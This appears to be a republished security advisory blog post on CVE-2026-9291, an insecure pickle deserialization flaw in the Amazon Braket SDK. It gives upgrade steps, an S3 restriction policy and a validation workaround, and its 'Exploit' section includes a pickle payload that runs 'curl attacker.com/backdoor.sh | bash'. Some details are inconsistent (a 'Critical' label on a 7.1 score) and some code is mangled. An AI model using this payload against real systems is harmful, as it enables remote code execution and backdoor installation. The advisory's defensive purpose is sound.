Listen to this Post
How CVE-2026-9291 Works
Amazon Braket SDK is an open-source Python library for interacting with the Amazon Braket quantum computing service, including managing hybrid quantum jobs and retrieving job results. The vulnerability stems from insecure deserialization (CWE-502) in the job results processing component.
The SDK’s `deserialize_values()` function reads the `dataFormat` field directly from the job results JSON file (results.json) stored in an S3 bucket without validation. Under normal operation, this field is set to PLAINTEXT, and the SDK safely processes the data. However, the SDK also supports a `pickled_v4` format, which triggers Python’s `pickle.loads()` to deserialize the data payload.
An attacker with S3 write access to a victim’s Braket job output bucket can exploit this by:
1. Modifying the `dataFormat` field in `results.json` from `PLAINTEXT` to `pickled_v4`
2. Replacing the `dataDictionary` values with base64-encoded malicious Python pickle payloads
3. When the victim calls job.result(), load_job_result(), or `load_job_checkpoint()` as part of their normal Braket workflow, the SDK calls `pickle.loads()` on the attacker-controlled data
This executes arbitrary code with the victim’s permissions on any machine that processes the job results. The attack requires minimal privileges beyond S3 write access, making it accessible to attackers who have already gained some level of system access.
The vulnerability affects all versions from v1.10.0 up to but not including v1.117.0. It was patched in version 1.117.0 released on May 22, 2026.
DailyCVE Form:
Platform: ……. Amazon Braket SDK
Version: …….. >= v1.10.0, < v1.117.0
Vulnerability :.. Insecure Deserialization (CWE-502)
Severity: ……. Critical (CVSS 3.1: 7.1)
date: ……….. 2026-05-22
Prediction: ….. Patch expected May 22, 2026
What Undercode Say:
Analytics
The vulnerability represents a significant security risk that can be exploited by remote authenticated attackers who possess S3 write access to job output buckets. The flaw stems from the SDK’s improper handling of serialized data during job result processing, creating an attack surface where maliciously crafted serialized objects can be executed on systems processing these results. This attack vector is particularly dangerous because it leverages legitimate SDK functionality while exploiting the trust relationship between the SDK and the serialized data it processes. The vulnerability falls under the ATT&CK technique T1203 for Exploitation for Execution.
Bash Commands & Code
Check installed version:
pip show amazon-braket-sdk | grep Version
Upgrade to patched version:
pip install --upgrade amazon-braket-sdk>=1.117.0
Verify S3 bucket permissions (audit):
aws s3api get-bucket-policy --bucket YOUR_BRAKET_OUTPUT_BUCKET
Restrict S3 write access (least privilege):
aws s3api put-bucket-policy --bucket YOUR_BRAKET_OUTPUT_BUCKET --policy file://policy.json
Example policy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Deny",
"Principal": "",
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::YOUR_BRAKET_OUTPUT_BUCKET/",
"Condition": {
"StringNotEquals": {
"aws:PrincipalArn": "arn:aws:iam::YOUR_ACCOUNT:role/TRUSTED_ROLE"
}
}
}
]
}
Validate dataFormat before processing (workaround):
import json
def safe_load_result(s3_key):
Fetch results.json from S3
data = json.loads(results_json_content)
if data.get('dataFormat') == 'pickled_v4':
Refuse to process unless pickle was explicitly configured
raise ValueError("Untrusted pickled_v4 format detected")
Proceed with safe processing
return process_result(data)
Exploit:
An attacker with S3 write access to the victim’s Braket job output bucket can:
1. Locate the target `results.json` file in the victim’s S3 output bucket
2. Modify the JSON by changing `”dataFormat”: “PLAINTEXT”` to `”dataFormat”: “pickled_v4″`
3. Replace data payload with a base64-encoded malicious pickle object
4. Wait for the victim to call job.result(), load_job_result(), or `load_job_checkpoint()`
5. Achieve RCE when the SDK executes `pickle.loads()` on the malicious payload
Example malicious payload generation:
import pickle
import base64
import os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('curl attacker.com/backdoor.sh | bash',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
Insert payload into dataDictionary of results.json
The attacker gains code execution with the victim’s permissions on any machine that processes the job results.
Protection:
Primary Mitigation:
- Upgrade to amazon-braket-sdk version 1.117.0 or later immediately
Workarounds (if unable to upgrade immediately):
- Restrict S3 bucket policies on Braket job output buckets to enforce least-privilege access, ensuring only trusted principals have `s3:PutObject` permissions
- Validate the `dataFormat` field in job result metadata before calling `job.result()` and refuse to process results where the format is `pickled_v4` unless pickle serialization was explicitly configured
- Implement monitoring for suspicious S3 bucket activities and consider restricting write permissions to job output buckets
Recommended Security Practices:
- Update the SDK/fork so results processing validates the `dataFormat` field and refuses to deserialize `pickled_v4` unless explicitly configured
- Ensure the SDK no longer calls `pickle.loads()` on actor-controlled results without proper validation
Impact:
- Arbitrary Code Execution: Attackers can execute arbitrary code on any machine that processes Braket job results
- Full System Compromise: Enables attackers to gain full control over systems processing Braket job results
- Data Exfiltration: Leads to potential data theft from compromised systems
- Lateral Movement: Enables network infiltration and lateral movement within infrastructure
- Widespread Risk: Affects any machine that processes job results through affected SDK versions across distributed computing environments
- Production Impact: Organizations using the SDK in production face significant risk of unauthorized access and potential system compromise
For security questions or concerns, contact AWS Security at [email protected].
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
